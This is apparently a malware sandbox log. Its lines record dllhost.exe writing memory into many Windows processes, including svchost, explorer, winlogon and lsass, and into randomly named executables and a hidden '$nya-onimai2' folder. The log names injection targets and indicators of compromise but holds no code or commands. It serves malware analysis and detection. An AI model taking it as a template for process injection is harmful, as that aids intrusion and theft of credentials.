Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FB7270000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25177B50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20859990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 3310000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 175C5280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13E5E930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27234C50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28543540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 2B684340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 247B4700000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1DAD8A40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE3F3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC87880000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1C39C960000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2D30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2700000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 10C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 20F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 15D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 26D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2430000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DD590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160CB60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2FB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 257E1070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 254A27C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 30C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 28E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 29F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2330000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 840000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A205670000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3000000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 970000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: FE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26238950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 24D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2AC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2786E560000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B279570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1290000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\$nya-onimai2\qVrKPA.exe base: 1910E500000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D13110000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA5E060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: ED0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 940000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C782530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: A60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
